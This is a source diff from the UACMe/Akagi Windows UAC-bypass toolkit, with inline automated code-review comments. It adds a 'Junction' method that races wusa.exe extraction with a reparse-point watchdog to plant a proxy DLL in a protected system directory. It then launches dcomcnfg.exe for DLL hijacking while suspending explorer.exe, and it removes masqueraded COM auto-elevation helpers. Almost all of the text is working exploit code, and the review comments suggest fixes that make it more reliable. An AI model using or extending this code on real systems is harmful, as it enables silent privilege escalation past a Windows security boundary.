+ if (*(lpEnd - 1) == TEXT('\\'))
+ *(lpEnd - 1) = TEXT('\0');
+
+ if (!ucmWusaExtractViaJunction(lpTargetDirectory)) {
+ bDropComplete = FALSE;
+ break;
+ }
+
+ bDropComplete = TRUE;
+ }
+
+ if (!bDropComplete)
+ break;
+
+ //
+ // Exploit dll hijacking.
+ //
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ _strcpy(szBuffer, g_ctx.szSystemDirectory);
+ _strcat(szBuffer, DCOMCNFG_EXE);
+ bResult = supRunProcess(szBuffer, NULL);
+
+ } while (bCond);
+
+ if (hKey != NULL)
+ RegCloseKey(hKey);
+
+ return bResult;
+}
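Review bot: In the enumeration loop of ucmJunctionMethod the `lResult` from `RegEnumValue` is never checked, so on failure `szBuffer` is still the zeroed array and `_filepath` is applied to an empty string; if that yields an empty `lpTargetDirectory`, `_strend` presumably returns the buffer start and `*(lpEnd - 1)` then reads and writes one WCHAR before the array. Check the status like the other registry calls (`if (lResult != ERROR_SUCCESS) { bDropComplete = FALSE; break; }`) and guard the trim with `if ((lpEnd > lpTargetDirectory) && (*(lpEnd - 1) == TEXT('\\')))`. A related off-by-one: `cbMaxValueNameLen > MAX_PATH` admits a name of exactly MAX_PATH characters, but the `bytesIO = MAX_PATH` passed to RegEnumValue must include the terminator, so such a name fails with ERROR_MORE_DATA; compare with `>=` or pass `MAX_PATH + 1` (the buffer is `MAX_PATH * 2`). Separately, `&szBuffer` in the zeroing call and the `(LPWSTR)&szBuffer` cast should simply be `szBuffer`, and `LRESULT lResult` for the Reg* status should be `LSTATUS`.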
diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h
index 7765862..0bbbc50 100644
--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 20 June 2017
*
* Prototypes and definitions for hybrid methods.
*
@@ -96,3 +96,7 @@ BOOL ucmWow64LoggerMethod(
BOOL ucmUiAccessMethod(
PVOID ProxyDll,
DWORD ProxyDllSize);
+
+BOOL ucmJunctionMethod(
+ PVOID ProxyDll,
+ DWORD ProxyDllSize);
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index f73413d..14f182b 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* UAC bypass dispatch.
*
@@ -47,6 +47,7 @@ UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodTokenMod);
+UCM_API(MethodJunction);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@@ -78,13 +79,14 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodEnigma0x3_2, NULL, { 7600, 15031 }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodExpLife, NULL, { 7600, 16199 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodSandworm, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE },
- { MethodEnigma0x3_3, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
+ { MethodEnigma0x3_3, NULL, { 10240, 16215 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodWow64Logger, NULL, { 7600, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
+ { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
+ { MethodJunction, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};
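Review bot: The new `MethodJunction` row is appended last and `UacMethodJunction` is added just before `UacMethodMax` in methods.h, so the two stay in step, but nothing on the table states that its row order must match the `UCM_METHOD` enum or that `UCM_DISPATCH_ENTRY_MAX` (defined outside this diff, presumably from `UacMethodMax`) must grow with it. A comment above the initializer, `// Row order must match the UCM_METHOD enum in methods.h`, would catch the next addition that updates only one side. The trailing `FALSE, TRUE, TRUE` fields are positional and unnamed; C99 designated initializers would make rows like this one self-describing if the project's compiler settings allow them.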
/*
@@ -686,3 +688,11 @@ UCM_API(MethodTokenMod)
return ucmTokenModification(lpszPayload);
}
+
+UCM_API(MethodJunction)
+{
+ UNREFERENCED_PARAMETER(Method);
+ UNREFERENCED_PARAMETER(ExtraContext);
+
+ return ucmJunctionMethod(PayloadCode, PayloadSize);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 8e18875..4ba86b7 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -55,6 +55,7 @@ typedef enum _UCM_METHOD {
UacMethodMsSettings, //+
UacMethodTyranid, //+
UacMethodTokenMod, //+
+ UacMethodJunction, //+
UacMethodMax
} UCM_METHOD;
@@ -88,6 +89,8 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
BOOL SetParameterInRegistry;
} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;
+#include "comfileop.h"
+#include "wusa.h"
#include "pitou.h"
#include "simda.h"
#include "explife.h"
diff --git a/Source/Akagi/methods/pitou.c b/Source/Akagi/methods/pitou.c
index 1286a7a..4fb4e75 100644
--- a/Source/Akagi/methods/pitou.c
+++ b/Source/Akagi/methods/pitou.c
@@ -4,9 +4,9 @@
*
* TITLE: PITOU.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 07 May 2017
+* DATE: 10 June 2017
*
* Leo Davidson based IFileOperation auto-elevation.
*
@@ -18,283 +18,6 @@
*******************************************************************************/
#include "global.h"
-/*
-* ucmMasqueradedRenameElementCOM
-*
-* Purpose:
-*
-* Rename file/directory autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedRenameElementCOM(
- _In_ LPWSTR OldName,
- _In_ LPWSTR NewName
-)
-{
- BOOL bCond = FALSE, bResult = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *psiDestDir = NULL;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((OldName == NULL) || (NewName == NULL))
- break;
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK) {
- break;
- }
-
- psiDestDir->lpVtbl->Release(psiDestDir);
- psiDestDir = NULL;
-
- bResult = TRUE;
-
- } while (bCond);
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- if (psiDestDir != NULL) {
- psiDestDir->lpVtbl->Release(psiDestDir);
- }
-
- return bResult;
-}
-
-/*
-* ucmMasqueradedCreateSubDirectoryCOM
-*
-* Purpose:
-*
-* Create directory autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedCreateSubDirectoryCOM(
- _In_ LPWSTR ParentDirectory,
- _In_ LPWSTR SubDirectory
-)
-{
- BOOL bCond = FALSE, bResult = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *psiDestDir = NULL;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((SubDirectory == NULL) || (ParentDirectory == NULL))
- break;
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK) {
- break;
- }
-
- psiDestDir->lpVtbl->Release(psiDestDir);
- psiDestDir = NULL;
-
- bResult = TRUE;
-
- } while (bCond);
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- if (psiDestDir != NULL) {
- psiDestDir->lpVtbl->Release(psiDestDir);
- }
-
- return bResult;
-}
-
-/*
-* ucmMasqueradedMoveCopyFileCOM
-*
-* Purpose:
-*
-* Move or Copy file autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedMoveCopyFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir,
- _In_ BOOL fMove
-)
-{
- BOOL cond = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *isrc = NULL, *idst = NULL;
- SHELLEXECUTEINFOW shexec;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((SourceFileName == NULL) || (DestinationDir == NULL))
- break;
-
- RtlSecureZeroMemory(&shexec, sizeof(shexec));
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK)
- break;
-
- if (FileOperation1 != NULL)
- FileOperation1->lpVtbl->Release(FileOperation1);
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK)
- break;
-
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
- if (r != S_OK)
- break;
-
- r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
- if (r != S_OK)
- break;
-
- if (fMove)
- r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
- else
- r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
-
- if (r != S_OK)
- break;
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK)
- break;
-
- idst->lpVtbl->Release(idst);
- idst = NULL;
- isrc->lpVtbl->Release(isrc);
- isrc = NULL;
-
- } while (cond);
-
- if (FileOperation1 != NULL)
- FileOperation1->lpVtbl->Release(FileOperation1);
-
- if (isrc != NULL)
- isrc->lpVtbl->Release(isrc);
-
- if (idst != NULL)
- idst->lpVtbl->Release(idst);
-
- return (SUCCEEDED(r));
-}
-
-/*
-* ucmMasqueradedMoveFileCOM
-*
-* Purpose:
-*
-* Move file autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedMoveFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir
-)
-{
- return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
-}
-
/*
* ucmStandardAutoElevation2
*
@@ -479,40 +202,3 @@ BOOL ucmStandardAutoElevation(
return bResult;
}
-
-/*
-* ucmMasqueradedCoGetObjectElevate
-*
-* Purpose:
-*
-* CoGetObject elevation as admin.
-*
-*/
-HRESULT ucmMasqueradedCoGetObjectElevate(
- _In_ LPWSTR clsid,
- _In_ DWORD dwClassContext,
- _In_ REFIID riid,
- _Outptr_ void **ppv
-)
-{
- HRESULT r = E_FAIL;
- BIND_OPTS3 bop;
- WCHAR szElevationMoniker[MAX_PATH];
-
- if (clsid == NULL)
- return r;
-
- if (_strlen(clsid) > 64)
- return r;
-
- RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
-
- _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
- _strcat(szElevationMoniker, clsid);
-
- RtlSecureZeroMemory(&bop, sizeof(bop));
- bop.cbStruct = sizeof(bop);
- bop.dwClassContext = dwClassContext;
-
- return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
-}
diff --git a/Source/Akagi/methods/pitou.h b/Source/Akagi/methods/pitou.h
index 20b440f..0782923 100644
--- a/Source/Akagi/methods/pitou.h
+++ b/Source/Akagi/methods/pitou.h
@@ -4,9 +4,9 @@
*
* TITLE: PITOU.H
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 10 June 2017
*
* Prototypes and definitions for Leo Davidson method.
*
@@ -26,26 +26,3 @@ BOOL ucmStandardAutoElevation(
BOOL ucmStandardAutoElevation2(
CONST PVOID ProxyDll,
DWORD ProxyDllSize);
-
-BOOL ucmMasqueradedCreateSubDirectoryCOM(
- _In_ LPWSTR ParentDirectory,
- _In_ LPWSTR SubDirectory);
-
-BOOL ucmMasqueradedMoveCopyFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir,
- _In_ BOOL fMove);
-
-BOOL ucmMasqueradedMoveFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir);
-
-BOOL ucmMasqueradedRenameElementCOM(
- _In_ LPWSTR OldName,
- _In_ LPWSTR NewName);
-
-HRESULT ucmMasqueradedCoGetObjectElevate(
- _In_ LPWSTR clsid,
- _In_ DWORD dwClassContext,
- _In_ REFIID riid,
- _Outptr_ void **ppv);
diff --git a/Source/Akagi/methods/tyranid.c b/Source/Akagi/methods/tyranid.c
index 7e3be40..7286b28 100644
--- a/Source/Akagi/methods/tyranid.c
+++ b/Source/Akagi/methods/tyranid.c
@@ -4,15 +4,18 @@
*
* TITLE: TYRANID.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 11 June 2017
*
* James Forshaw autoelevation method(s)
* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -192,7 +195,7 @@ BOOL ucmTokenModification(
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
- sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
+ (ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
diff --git a/Source/Akagi/methods/wusa.c b/Source/Akagi/methods/wusa.c
new file mode 100644
index 0000000..0aa3cbf
--- /dev/null
+++ b/Source/Akagi/methods/wusa.c
@@ -0,0 +1,426 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: WUSA.C
+*
+* VERSION: 2.74
+*
+* DATE: 20 June 2017
+*
+* Windows Update Standalone Installer (WUSA) based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#include "makecab.h"
+
+/*
+* ucmWusaExtractPackage
+*
+* Purpose:
+*
+* Extract cab to protected directory using wusa.
+* This routine expect source as ellocnak.msu cab file in the %temp% folder.
+*
+*/
+BOOL ucmWusaExtractPackage(
+ _In_ LPWSTR lpTargetDirectory
+)
+{
+ BOOL bResult = FALSE;
+ SIZE_T Size;
+ LPWSTR lpCommandLine = NULL;
+ WCHAR szMsuFileName[MAX_PATH * 2];
+
+ if (lpTargetDirectory == NULL)
+ return FALSE;
+
+ RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
+ _strcpy(szMsuFileName, g_ctx.szTempDirectory);
+ _strcat(szMsuFileName, ELLOCNAK_MSU);
+
+ Size = ((1 + _strlen(lpTargetDirectory) +
+ _strlen(szMsuFileName) +
+ MAX_PATH) * sizeof(WCHAR));
+
+ lpCommandLine = (LPWSTR)supHeapAlloc(Size);
+ if (lpCommandLine) {
+
+ _strcpy(lpCommandLine, L"/c wusa ");
+ _strcat(lpCommandLine, szMsuFileName);
+ _strcat(lpCommandLine, L" /extract:");
+ _strcat(lpCommandLine, lpTargetDirectory);
+
+ bResult = supRunProcess(CMD_EXE, lpCommandLine);
+
+ supHeapFree(lpCommandLine);
+ }
+ DeleteFile(szMsuFileName);
+ return bResult;
+}
+
+/*
+* ucmCreateCabinetForSingleFile
+*
+* Purpose:
+*
+* Build cabinet for usage in methods where required 1 file.
+*
+*/
+BOOL ucmCreateCabinetForSingleFile(
+ _In_ LPWSTR lpSourceDll,
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize
+)
+{
+ BOOL cond = FALSE, bResult = FALSE;
+ CABDATA *Cabinet = NULL;
+ LPWSTR lpFileName;
+ WCHAR szMsuFileName[MAX_PATH * 2];
+
+ if ((ProxyDll == NULL) ||
+ (ProxyDllSize == 0) ||
+ (lpSourceDll == NULL)) return bResult;
+
+ do {
+
+ //drop proxy dll
+ if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
+ break;
+ }
+
+ //build cabinet
+ RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
+ _strcpy(szMsuFileName, g_ctx.szTempDirectory);
+ _strcat(szMsuFileName, ELLOCNAK_MSU);
+
+ Cabinet = cabCreate(szMsuFileName);
+ if (Cabinet == NULL)
+ break;
+
+ lpFileName = _filename(lpSourceDll);
+ //put file without compression
+ bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
+ cabClose(Cabinet);
+
+ } while (cond);
+
+ return bResult;
+}
+
+volatile ULONG g_ThreadFinished = 0;
+
+/*
+* ucmxInvokeWusaThread
+*
+* Purpose:
+*
+* Start wusa and wait a bit.
+*
+*/
+DWORD ucmxInvokeWusaThread(
+ PVOID Param)
+{
+ SHELLEXECUTEINFO shinfo;
+ WCHAR szProcess[MAX_PATH * 2];
+ WCHAR szParameters[MAX_PATH * 3];
+
+ UNREFERENCED_PARAMETER(Param);
+
+ InterlockedExchange((LONG*)&g_ThreadFinished, 0);
+
+ RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
+
+ _strcpy(szProcess, g_ctx.szSystemDirectory);
+ _strcat(szProcess, WUSA_EXE);
+
+ RtlSecureZeroMemory(szParameters, sizeof(szParameters));
+ _strcpy(szParameters, TEXT(" /quiet "));
+ _strcat(szParameters, g_ctx.szTempDirectory);
+ _strcat(szParameters, ELLOCNAK_MSU);
+
+ shinfo.cbSize = sizeof(shinfo);
+ shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;
+ shinfo.lpFile = szProcess;
+ shinfo.lpParameters = szParameters;
+ shinfo.nShow = SW_HIDE;
+
+ if (ShellExecuteEx(&shinfo)) {
+
+ if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)
+ TerminateProcess(shinfo.hProcess, 0);
+
+ CloseHandle(shinfo.hProcess);
+ InterlockedExchange((LONG*)&g_ThreadFinished, 1);
+ }
+ return 0;
+}
+
+/*
+* ucmxDirectoryWatchdogThread
+*
+* Purpose:
+*
+* Monitor directory creation in system root directory.
+* When it happened - set reparse point.
+*
+*/
+DWORD ucmxDirectoryWatchdogThread(
+ PVOID Param)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ NTSTATUS status;
+
+ HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;
+ IO_STATUS_BLOCK IoStatusBlock;
+ OBJECT_ATTRIBUTES ObjectAttributes;
+
+ LPWSTR lpTargetDirectory = (LPWSTR)Param;
+
+ PVOID Buffer = NULL;
+ SIZE_T memIO = 0;
+ FILE_NOTIFY_INFORMATION *pInfo = NULL;
+
+ LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL;
+
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;
+
+
+ do {
+
+ //
+ // Convert target directory path to native form.
+ //
+ usTargetDirectory.Buffer = NULL;
+ if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))
+ break;
+
+ //
+ // Convert watch directory path to native form.
+ //
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ szBuffer[0] = L'\\';
+ szBuffer[1] = L'?';
+ szBuffer[2] = L'?';
+ szBuffer[3] = L'\\';
+ _strncpy(&szBuffer[4], MAX_PATH, g_ctx.szSystemDirectory, 3);
+
+ //
+ // Open directory for change notification.
+ //
+ usWatchDirectory.Buffer = NULL;
+ RtlInitUnicodeString(&usWatchDirectory, szBuffer);
+ InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL);
+
+ status = NtCreateFile(&hDirectory,
+ FILE_LIST_DIRECTORY | SYNCHRONIZE,
+ &ObjectAttributes,
+ &IoStatusBlock,
+ NULL,
+ FILE_OPEN_FOR_BACKUP_INTENT,
+ FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+ FILE_OPEN,
+ FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
+ NULL,
+ 0);
+
+ if (!NT_SUCCESS(status))
+ break;
+
+ memIO = 1024 * 1024;
+ Buffer = supHeapAlloc(memIO);
+ if (Buffer == NULL)
+ break;
+
+ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
+ status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
+ if (!NT_SUCCESS(status))
+ break;
+
+ //
+ // Watch for directory changes.
+ //
+ do {
+
+ status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
+ &IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);
+
+ if (status == STATUS_PENDING)
+ NtWaitForSingleObject(hEvent, TRUE, NULL);
+
+ NtSetEvent(hEvent, NULL);
+
+ pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
+ for (;;) {
+
+ if (pInfo->Action == FILE_ACTION_ADDED) {
+
+ memIO = pInfo->FileNameLength +
+ ((1 + _strlen(szBuffer)) * sizeof(WCHAR));
+
+ CapturedDirectoryName = supHeapAlloc(memIO);
+
+ if (CapturedDirectoryName) {
+ _strcpy(CapturedDirectoryName, szBuffer);
+ lpEnd = _strend(CapturedDirectoryName);
+ RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);
+
+ //
+ // Open new directory to set reparse point.
+ //
+ usReparseDirectory.Buffer = NULL;
+ RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
+ InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtCreateFile(&hReparseDirectory,
+ FILE_ALL_ACCESS,
+ &ObjectAttributes,
+ &IoStatusBlock,
+ NULL,
+ 0,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ FILE_OPEN,
+ FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
+ NULL,
+ 0);
+
+ if (NT_SUCCESS(status)) {
+
+ //
+ // Set reparse point.
+ //
+ bResult = supSetMountPoint(hReparseDirectory,
+ usTargetDirectory.Buffer,
+ lpTargetDirectory);
+
+ }
+
+ status = STATUS_NO_SECRETS;
+ }
+
+ } //Action
+
+ if (status == STATUS_NO_SECRETS)
+ break;
+
+ pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
+ if (pInfo->NextEntryOffset == 0)
+ break;
+ }
+
+ } while (NT_SUCCESS(status));
+
+ } while (bCond);
+
+ //
+ // Cleanup.
+ //
+ if (hEvent)
+ NtClose(hEvent);
+
+ if (hDirectory != NULL)
+ NtClose(hDirectory);
+
+ if (usTargetDirectory.Buffer)
+ RtlFreeUnicodeString(&usTargetDirectory);
+
+ if (Buffer != NULL)
+ supHeapFree(Buffer);
+
+ //
+ // Remove reparse point.
+ //
+ if (CapturedDirectoryName) {
+
+ while (g_ThreadFinished != 1)
+ Sleep(100);
+
+ if (hReparseDirectory) {
+ supDeleteMountPoint(hReparseDirectory);
+ NtClose(hReparseDirectory);
+ }
+
+ RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
+ InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ NtDeleteFile(&ObjectAttributes);
+ supHeapFree(CapturedDirectoryName);
+ }
+
+ return (DWORD)bResult;
+}
+
+/*
+* ucmWusaExtractViaJunction
+*
+* Purpose:
+*
+* Extract cab contents to the specified directory by initializing wusa race condition.
+* This routine expect source as ellocnak.msu cab file in the %temp% folder.
+*
+*/
+BOOL ucmWusaExtractViaJunction(
+ _In_ LPWSTR lpTargetDirectory
+)
+{
+ BOOL bCond = FALSE;
+
+#ifndef _DEBUG
+ HANDLE hExplorer = NULL;
+#endif
+
+ HANDLE hWatchdogThread, hWusaThread;
+ DWORD ti;
+
+ //
+ // Query explorer.exe handle and use it to suspend process.
+ // Thus blocking unwanted user changes during work.
+ //
+#ifndef _DEBUG
+ hExplorer = supGetExplorerHandle();
+ if (hExplorer != NULL) {
+ NtSuspendProcess(hExplorer);
+ }
+#endif
+
+ do {
+
+ //
+ // Run watchdog thread.
+ //
+ hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);
+ if (hWatchdogThread == NULL)
+ break;
+
+ //
+ // Run wusa in separate thread.
+ //
+ hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);
+ if (hWusaThread) {
+ if (WaitForSingleObject(hWusaThread, 5000) == WAIT_TIMEOUT)
+ TerminateThread(hWusaThread, 0);
+
+ CloseHandle(hWusaThread);
+ }
+
+ if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)
+ TerminateThread(hWatchdogThread, 0);
+
+ CloseHandle(hWatchdogThread);
+
+ } while (bCond);
+
+#ifndef _DEBUG
+ if (hExplorer != NULL) {
+ NtResumeProcess(hExplorer);
